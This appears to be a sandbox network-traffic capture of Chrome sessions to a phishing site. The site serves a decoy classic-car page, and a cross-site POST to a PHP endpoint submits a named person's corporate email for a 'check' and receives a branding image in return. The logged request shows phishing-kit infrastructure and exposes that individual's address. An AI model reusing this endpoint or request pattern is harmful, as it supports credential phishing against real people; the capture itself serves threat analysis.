                            2024-08-13 19:58:06 UTC716INData Raw: 31 61 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6c 61 73 73 69 63 20 43 61 72 20 41 64 6d 69 72 65 72 73 20 2d 20 74 65 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e
                            Data Ascii: 1ad6<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Classic Car Admirers - technucleuswe.ru</title> <link href="https://cdn.jsdelivr.net/n
                            2024-08-13 19:58:06 UTC1369INData Raw: 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 35 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 65 6e 74 2d 73 65 63 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 34 33 61 34 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                            Data Ascii: color: white; padding: 150px 0; text-align: center; } .content-section { padding: 60px 0; } .footer { background: #343a40; color: white;
                            2024-08-13 19:58:06 UTC1369INData Raw: 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 2f 23 61 62 6f 75 74 22 3e 41 62 6f 75 74 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 2f 23 73 65 72 76 69 63 65 73 22 3e 53 65 72 76 69 63 65 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                            Data Ascii: av-link" href="https://technucleuswe.ru/#about">About</a> </li> <li class="nav-item"> <a class="nav-link" href="https://technucleuswe.ru/#services">Services</a> </li>
                            2024-08-13 19:58:06 UTC1369INData Raw: 30 64 37 22 3e 5b 65 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 20 6f 72 20 63 61 6c 6c 20 75 73 20 61 74 20 35 35 35 2d 38 36 37 2d 30 33 33 32 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6c 6f 63 6b 71 75 6f 74 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 71 75 6f 74 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 54 68 65 20 63 61 72 73 20 77 65 20 64 72 69 76 65 20 73 61 79 20 61 20 6c 6f 74 20 61 62 6f 75 74 20 75 73 2e 20 2d 20 41 6c 65 78 61 6e 64 72 61 20 50 61 75 6c 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 6c 6f 63 6b 71 75 6f 74 65 3e 0d 0a 20 20 20 20 20 20 20
                            Data Ascii: 0d7">[email&#160;protected]</span></a> or call us at 555-867-0332.</p> <blockquote class="blockquote"> <p class="mb-0">The cars we drive say a lot about us. - Alexandra Paul</p> </blockquote>
                            2024-08-13 19:58:06 UTC1369INData Raw: 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 74 65 78 74 22 3e 45 78 70 6c 6f 72 65 20 74 68 65 20 6c 61 74 65 73 74 20 61 6e 64 20 67 72 65 61 74 65 73 74 20 69 6e 20 73 75 70 65 72 63 61 72 20 74 65 63 68 6e 6f 6c 6f 67 79 2c 20 70 65 72 66 6f 72 6d 61 6e 63 65 2c 20 61 6e 64 20 64 65 73 69 67 6e 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 2f 23 6d 6f 64 65 72 6e 2d 73 75 70 65 72 63 61 72 73 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 52 65 61 64 20 4d 6f 72 65 3c 2f 61 3e 0d 0a 20
                            Data Ascii: </h5> <p class="card-text">Explore the latest and greatest in supercar technology, performance, and design.</p> <a href="https://technucleuswe.ru/#modern-supercars" class="btn btn-primary">Read More</a>
                            2024-08-13 19:58:06 UTC686INData Raw: 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 2f 23 74 65 72 6d 73 22 3e 54 65 72 6d 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 65 63 68 6e 75 63 6c 65 75 73 77 65 2e 72 75 2f 23 66 61 71 22 3e 46 41 51 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20
                            Data Ascii: <li class="list-inline-item"> <a href="https://technucleuswe.ru/#terms">Terms</a> </li> <li class="list-inline-item"> <a href="https://technucleuswe.ru/#faq">FAQ</a> </li>
                            2024-08-13 19:58:06 UTC9INData Raw: 34 0d 0a 0d 0a 0d 0a 0d 0a
                            Data Ascii: 4
                            2024-08-13 19:58:06 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            35192.168.2.659194188.114.96.34432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:07 UTC680OUTPOST ///3799.php HTTP/1.1
                            Host: technucleuswe.ru
                            Connection: keep-alive
                            Content-Length: 43
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Accept: application/json, text/javascript, */*; q=0.01
                            Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Origin: https://bytebloomoe.ru
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Referer: https://bytebloomoe.ru/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:58:07 UTC43OUTData Raw: 64 6f 3d 63 68 65 63 6b 26 65 6d 3d 70 61 74 74 69 2e 70 61 73 73 6d 6f 72 65 40 66 69 72 73 74 6f 6e 74 61 72 69 6f 2e 63 6f 6d
                            Data Ascii: do=check&em=patti.passmore@firstontario.com
                            2024-08-13 19:58:08 UTC774INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:58:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            x-powered-by: PHP/7.3.33
                            access-control-allow-origin: *
                            cache-control: no-store, no-cache, must-revalidate, max-age=0
                            pragma: no-cache
                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                            vary: Accept-Encoding
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G0dHDsU6ZPxGncepWuqqf5iTpLjqsa6GXq0chWyS2v459pCC7Y5Vr4blPzlb%2BDWH%2BhIkkuTCtZlDGTXPTntPfecGFL1My1R37SjqLOuGQAORYd%2FrBC4eMHY2Fxz7PzEHWduT"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8b2b472f58ad2365-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:58:08 UTC595INData Raw: 35 30 39 61 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 62 61 6e 6e 65 72 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 5c 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 52 67 41 41 41 41 38 43 41 4d 41 41 41 43 4b 47 6c 55 71 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 4d 41 55 45 78 55 52 51 41 65 59 67 41 68 5a 41 41 6c 5a 67 41 6d 61 41 41 70 61 51 41 73 61 77 41 74 62 51 59 75 62 67 73 71 61 77 41 77 62 67 55 78 62 77 73 77 62 67 34 78 62 77 41 79 63 41 49 30 63 51 55 79 63 51 51 32 63 67 55 32 64 41 59 34 63 77 59 34 64 41 6b 32 63 77 6f 33 64 41 77 79 63 41 30 33 63 77 6b 35 64 51 73 38
                            Data Ascii: 509a{"status":"success","banner":"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAARgAAAA8CAMAAACKGlUqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAMAUExURQAeYgAhZAAlZgAmaAApaQAsawAtbQYubgsqawAwbgUxbwswbg4xbwAycAI0cQUycQQ2cgU2dAY4cwY4dAk2cwo3dAwycA03cwk5dQs8
                            2024-08-13 19:58:08 UTC1369INData Raw: 52 73 58 69 54 73 33 69 54 74 48 71 55 74 48 75 56 74 6e 75 57 74 58 32 57 74 6e 36 59 74 39 70 64 41 64 74 68 43 4e 78 69 43 74 78 6c 44 64 31 6f 45 74 31 71 46 74 35 72 47 4e 31 73 47 4e 35 75 48 4e 39 79 49 74 39 30 4a 65 42 32 4b 4f 42 35 4c 65 46 37 4d 4f 4a 39 4e 4f 4f 43 50 4f 53 4b 53 65 57 4f 54 75 61 50 55 4f 57 52 55 2b 61 53 56 65 65 56 57 75 65 58 58 4f 69 5a 58 2b 69 61 59 2b 6d 64 5a 75 6d 66 61 65 71 67 61 2b 75 6b 63 75 75 6f 64 34 43 5a 74 34 47 61 75 49 4f 63 75 59 57 64 75 6f 65 65 76 49 69 66 76 49 6d 68 76 59 79 69 76 6f 32 6b 76 34 36 6b 77 4a 43 6d 77 4a 4b 6f 77 70 53 70 77 70 57 71 78 4a 61 73 78 4a 71 75 78 70 79 76 78 35 79 76 79 4a 79 77 78 35 32 77 79 4b 43 79 79 61 47 30 79 71 4f 31 7a 4b 53 31 79 36 53 32 7a 4b 61 34 7a 61
                            Data Ascii: RsXiTs3iTtHqUtHuVtnuWtX2Wtn6Yt9pdAdthCNxiCtxlDd1oEt1qFt5rGN1sGN5uHN9yIt90JeB2KOB5LeF7MOJ9NOOCPOSKSeWOTuaPUOWRU+aSVeeVWueXXOiZX+iaY+mdZumfaeqga+ukcuuod4CZt4GauIOcuYWduoeevIifvImhvYyivo2kv46kwJCmwJKowpSpwpWqxJasxJquxpyvx5yvyJywx52wyKCyyaG0yqO1zKS1y6S2zKa4za
                            2024-08-13 19:58:08 UTC1369INData Raw: 31 33 41 63 63 57 46 56 39 56 59 62 37 56 55 7a 44 74 76 59 75 62 4e 73 59 39 55 63 42 7a 50 63 37 7a 56 66 5a 5a 75 4e 4a 64 33 6c 57 5c 2f 65 57 67 72 54 46 73 76 73 6c 54 5a 62 4a 35 6e 67 44 51 39 50 62 45 52 71 44 70 46 4b 36 6f 53 54 39 6c 30 62 70 47 6e 31 67 46 44 49 46 5a 55 30 71 42 66 32 79 74 41 65 7a 35 66 55 54 42 42 6d 6b 65 72 4b 79 6d 30 57 55 52 4c 4e 38 4b 50 79 68 37 58 71 36 71 76 39 76 36 41 55 63 53 42 65 72 74 6e 72 75 38 35 79 76 39 6c 55 77 42 55 58 62 33 6c 4a 58 65 6a 62 2b 67 44 48 48 63 4a 38 58 77 47 32 56 2b 69 6a 4e 57 41 73 77 55 50 56 45 75 6d 44 45 36 76 63 49 78 47 57 6a 54 4b 41 71 54 5c 2f 48 30 70 70 65 66 76 7a 33 54 6c 4b 64 2b 4f 77 5c 2f 73 44 78 31 79 67 57 31 52 54 34 57 32 53 4f 62 52 4c 47 30 47 65 5c 2f 41
                            Data Ascii: 13AccWFV9VYb7VUzDtvYubNsY9UcBzPc7zVfZZuNJd3lW\/eWgrTFsvslTZbJ5ngDQ9PbERqDpFK6oST9l0bpGn1gFDIFZU0qBf2ytAez5fUTBBmkerKym0WURLN8KPyh7Xq6qv9v6AUcSBertnru85yv9lUwBUXb3lJXejb+gDHHcJ8XwG2V+ijNWAswUPVEumDE6vcIxGWjTKAqT\/H0ppefvz3TlKd+Ow\/sDx1ygW1RT4W2SObRLG0Ge\/A
                            2024-08-13 19:58:08 UTC1369INData Raw: 75 68 48 64 43 51 4b 4c 63 6c 77 59 44 34 64 74 30 6d 72 4c 65 59 56 79 48 79 68 42 74 55 51 52 65 65 4f 72 51 5a 57 6f 61 79 46 32 6e 53 43 43 59 70 51 62 73 41 6c 57 4d 70 6c 66 68 54 6b 62 47 5c 2f 6a 6a 51 67 38 4b 62 61 37 6b 41 6b 5a 54 49 5a 59 4d 62 52 5a 47 47 38 4f 6d 2b 6d 67 53 6c 70 6d 79 66 70 64 44 44 46 57 4c 51 32 6d 4f 58 35 30 50 54 6b 69 4f 64 6f 4f 32 35 51 6f 76 79 51 44 6f 7a 49 66 31 6c 33 6f 5c 2f 51 57 63 77 56 33 49 6e 41 78 41 36 52 45 48 63 5a 6c 43 4f 4e 69 77 5a 55 52 44 48 6f 79 49 73 37 43 50 43 45 71 42 78 68 46 74 2b 31 66 37 79 30 6e 44 59 50 56 38 4f 4b 32 66 56 71 4d 6b 51 6e 6d 50 4b 5a 68 41 44 76 59 56 45 46 4a 69 39 6c 50 67 62 35 44 4d 44 66 38 6e 63 37 4b 44 54 78 47 65 48 41 64 67 47 6e 56 67 54 45 35 4c 35 46
                            Data Ascii: uhHdCQKLclwYD4dt0mrLeYVyHyhBtUQReeOrQZWoayF2nSCCYpQbsAlWMplfhTkbG\/jjQg8Kba7kAkZTIZYMbRZGG8Om+mgSlpmyfpdDDFWLQ2mOX50PTkiOdoO25QovyQDozIf1l3o\/QWcwV3InAxA6REHcZlCONiwZURDHoyIs7CPCEqBxhFt+1f7y0nDYPV8OK2fVqMkQnmPKZhADvYVEFJi9lPgb5DMDf8nc7KDTxGeHAdgGnVgTE5L5F
                            2024-08-13 19:58:08 UTC1369INData Raw: 75 49 33 68 41 6f 53 79 51 45 45 34 54 36 61 48 49 51 64 77 58 7a 6c 34 38 69 46 4b 59 54 76 5c 2f 5c 2f 6e 32 53 31 47 58 52 6c 31 38 42 74 77 77 4c 68 37 43 6f 4b 54 50 68 4e 42 39 5a 68 4a 77 41 42 46 53 54 42 33 51 6d 34 4c 33 69 45 6d 71 4f 38 59 78 4d 63 6c 54 47 75 42 53 58 51 72 4f 46 4c 6f 69 6d 39 37 43 64 4a 76 64 41 6b 34 4a 77 4b 35 4d 54 59 43 32 35 49 6f 4f 6e 4b 43 38 64 4d 48 56 51 79 4d 65 72 75 5c 2f 6b 68 6f 4b 72 69 6d 52 6c 7a 74 53 78 38 30 6b 6d 50 41 48 46 64 42 47 31 33 6d 57 54 75 71 76 54 76 35 42 53 70 5c 2f 35 77 38 38 54 4d 43 30 62 46 57 57 54 35 62 41 4f 44 4c 69 4f 41 32 5a 4c 6d 56 77 71 79 33 4a 46 59 2b 71 52 41 6d 69 30 75 51 49 79 5a 64 6c 63 72 78 74 6a 2b 42 4d 31 5a 72 4e 4d 71 70 65 56 4f 77 64 30 35 33 46 56 50
                            Data Ascii: uI3hAoSyQEE4T6aHIQdwXzl48iFKYTv\/\/n2S1GXRl18BtwwLh7CoKTPhNB9ZhJwABFSTB3Qm4L3iEmqO8YxMclTGuBSXQrOFLoim97CdJvdAk4JwK5MTYC25IoOnKC8dMHVQyMeru\/khoKrimRlztSx80kmPAHFdBG13mWTuqvTv5BSp\/5w88TMC0bFWWT5bAODLiOA2ZLmVwqy3JFY+qRAmi0uQIyZdlcrxtj+BM1ZrNMqpeVOwd053FVP
                            2024-08-13 19:58:08 UTC1369INData Raw: 4f 73 46 6b 57 6b 78 42 67 7a 70 63 32 72 7a 67 57 51 38 59 72 37 32 51 66 71 64 67 4b 38 34 45 30 33 37 54 61 32 6d 63 47 54 56 6c 57 6b 78 78 57 55 5c 2f 32 37 2b 4d 44 54 73 48 52 31 43 6a 79 47 63 38 38 77 57 49 71 65 73 62 39 59 34 48 30 58 70 49 57 6f 78 35 4d 76 68 64 4f 36 6a 32 33 6d 48 70 56 64 58 46 66 36 5a 4c 58 41 63 62 6e 53 49 4c 35 59 76 6f 67 45 45 77 73 35 68 62 61 78 6a 49 74 5a 6c 71 52 48 38 48 58 50 4e 48 52 43 55 4e 37 34 47 4f 67 50 5a 66 59 2b 53 72 4c 30 49 51 2b 4a 76 6e 4f 54 43 39 6d 4d 62 64 61 43 35 72 31 6a 78 56 52 37 39 5a 69 79 4b 35 30 72 72 43 43 5a 69 54 6c 41 54 43 4a 69 31 5a 48 67 33 6b 64 59 4c 36 78 76 62 41 4c 37 76 33 62 55 57 74 52 50 33 75 6a 78 59 52 67 35 74 52 67 6a 61 56 4e 7a 41 41 54 64 51 74 4f 66 46
                            Data Ascii: OsFkWkxBgzpc2rzgWQ8Yr72QfqdgK84E037Ta2mcGTVlWkxxWU\/27+MDTsHR1CjyGc88wWIqesb9Y4H0XpIWox5MvhdO6j23mHpVdXFf6ZLXAcbnSIL5YvogEEws5hbaxjItZlqRH8HXPNHRCUN74GOgPZfY+SrL0IQ+JvnOTC9mMbdaC5r1jxVR79ZiyK50rrCCZiTlATCJi1ZHg3kdYL6xvbAL7v3bUWtRP3ujxYRg5tRgjaVNzAATdQtOfF
                            2024-08-13 19:58:08 UTC1369INData Raw: 6e 4d 6a 49 6a 34 38 63 6d 52 6d 4f 6b 52 6c 63 32 4e 79 61 58 42 30 61 57 39 75 49 48 4a 6b 5a 6a 70 68 59 6d 39 31 64 44 30 69 64 58 56 70 5a 44 70 6d 59 57 59 31 59 6d 52 6b 4e 53 31 69 59 54 4e 6b 4c 54 45 78 5a 47 45 74 59 57 51 7a 4d 53 31 6b 4d 7a 4e 6b 4e 7a 55 78 4f 44 4a 6d 4d 57 49 69 49 48 68 74 62 47 35 7a 4f 6e 68 74 63 44 30 69 61 48 52 30 63 44 6f 76 4c 32 35 7a 4c 6d 46 6b 62 32 4a 6c 4c 6d 4e 76 62 53 39 34 59 58 41 76 4d 53 34 77 4c 79 49 2b 50 48 68 74 63 44 70 44 63 6d 56 68 64 47 56 45 59 58 52 6c 50 6a 49 77 4d 54 6b 74 4d 44 59 74 4d 54 4a 55 4d 6a 45 36 4d 54 55 36 4e 44 49 38 4c 33 68 74 63 44 70 44 63 6d 56 68 64 47 56 45 59 58 52 6c 50 6a 77 76 63 6d 52 6d 4f 6b 52 6c 63 32 4e 79 61 58 42 30 61 57 39 75 50 6a 77 76 63 6d 52 6d
                            Data Ascii: nMjIj48cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0idXVpZDpmYWY1YmRkNS1iYTNkLTExZGEtYWQzMS1kMzNkNzUxODJmMWIiIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyI+PHhtcDpDcmVhdGVEYXRlPjIwMTktMDYtMTJUMjE6MTU6NDI8L3htcDpDcmVhdGVEYXRlPjwvcmRmOkRlc2NyaXB0aW9uPjwvcmRm
                            2024-08-13 19:58:08 UTC1369INData Raw: 41 6c 4c 52 52 51 41 59 6f 6f 6f 6f 41 4b 4b 4b 57 6b 41 55 74 46 46 41 67 6f 70 61 4b 42 42 52 52 53 30 43 43 69 6c 6f 6f 41 4b 57 69 6a 46 41 67 70 61 4b 4b 41 43 6c 6f 78 53 30 43 45 70 61 4d 55 74 41 68 4d 55 59 70 63 55 59 6f 41 4b 4b 58 46 46 41 68 4b 4d 55 37 46 46 41 58 47 34 70 61 57 69 67 42 4b 4b 64 69 69 67 51 6c 47 4b 57 69 67 4c 69 59 6f 70 63 55 59 6f 41 53 69 6c 78 52 51 41 6c 47 4b 57 6b 6f 41 53 6c 78 52 52 51 41 6c 46 4c 52 51 41 6c 46 4c 53 55 44 43 69 69 69 67 42 4b 4b 57 69 67 42 4b 4b 57 69 67 42 4d 55 55 74 46 41 43 55 55 74 4a 69 67 41 70 4d 55 75 4b 4b 42 69 55 6c 4f 70 4b 41 45 6f 78 53 34 6f 6f 47 4e 6f 70 31 4a 51 41 6d 4b 53 6e 55 6c 41 44 61 4b 64 52 51 4d 62 52 53 30 55 41 4e 6f 70 31 4a 69 67 59 6d 4b 54 46 4f 78 52 54 43
                            Data Ascii: AlLRRQAYooooAKKKWkAUtFFAgopaKBBRRS0CCilooAKWijFAgpaKKACloxS0CEpaMUtAhMUYpcUYoAKKXFFAhKMU7FFAXG4paWigBKKdiigQlGKWigLiYopcUYoASilxRQAlGKWkoASlxRRQAlFLRQAlFLSUDCiiigBKKWigBKKWigBMUUtFACUUtJigApMUuKKBiUlOpKAEoxS4ooGNop1JQAmKSnUlADaKdRQMbRS0UANop1JigYmKTFOxRTC
                            2024-08-13 19:58:08 UTC1369INData Raw: 69 6b 70 61 4b 42 6a 4b 53 6e 30 6d 4b 42 6a 61 54 46 4f 78 52 69 67 59 79 6b 78 54 36 54 46 41 37 6a 63 55 6c 4f 78 52 69 6b 4f 34 7a 46 46 4f 78 53 55 44 47 30 6c 4f 70 4b 41 47 30 55 36 6b 4e 49 59 32 69 6c 70 4b 43 68 4b 53 6e 55 6c 41 44 61 53 6e 55 6c 49 59 68 70 4b 57 6b 6f 4b 45 70 4b 57 69 6b 41 6c 4a 53 30 6c 49 59 55 68 70 61 53 67 59 6c 46 46 4a 51 4d 4b 4b 4b 53 6b 41 55 55 55 55 68 68 53 55 55 6c 41 43 30 6c 46 46 41 77 6f 4e 46 42 70 41 4a 53 30 6c 46 41 77 6f 6f 36 30 6c 49 41 6f 6f 6f 6f 47 46 4a 53 30 6c 41 43 59 6f 6f 6f 72 6f 47 46 4c 52 53 30 43 45 6f 70 61 57 67 42 74 4c 53 30 55 43 43 6c 6f 70 63 55 43 43 6c 46 46 4c 51 49 42 53 30 55 74 41 67 70 61 53 6c 46 4d 51 59 70 61 4b 57 67 51 55 74 46 4c 51 49 53 67 55 74 46 41 67 6f 6f 70
                            Data Ascii: ikpaKBjKSn0mKBjaTFOxRigYykxT6TFA7jcUlOxRikO4zFFOxSUDG0lOpKAG0U6kNIY2ilpKChKSnUlADaSnUlIYhpKWkoKEpKWikAlJS0lIYUhpaSgYlFFJQMKKKSkAUUUUhhSUUlAC0lFFAwoNFBpAJS0lFAwoo60lIAooooGFJS0lACYoooroGFLRS0CEopaWgBtLS0UCClopcUCClFFLQIBS0UtAgpaSlFMQYpaKWgQUtFLQISgUtFAgoop


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            36192.168.2.659195151.101.2.1374432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:58:07 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                            Host: code.jquery.com
                            Connection: keep-alive
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            Accept: */*
                            Sec-Fetch-Site: none
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:58:07 UTC611INHTTP/1.1 200 OK
                            Connection: close
                            Content-Length: 89501
                            Server: nginx
                            Content-Type: application/javascript; charset=utf-8
                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                            ETag: "28feccc0-15d9d"
                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                            Access-Control-Allow-Origin: *
                            Cross-Origin-Resource-Policy: cross-origin
                            Via: 1.1 varnish, 1.1 varnish
                            Accept-Ranges: bytes
                            Date: Tue, 13 Aug 2024 19:58:07 GMT
                            Age: 1594644
                            X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890041-NYC
                            X-Cache: HIT, HIT
                            X-Cache-Hits: 55, 1
                            X-Timer: S1723579087.426628,VS0,VE1
                            Vary: Accept-Encoding
                            2024-08-13 19:58:07 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
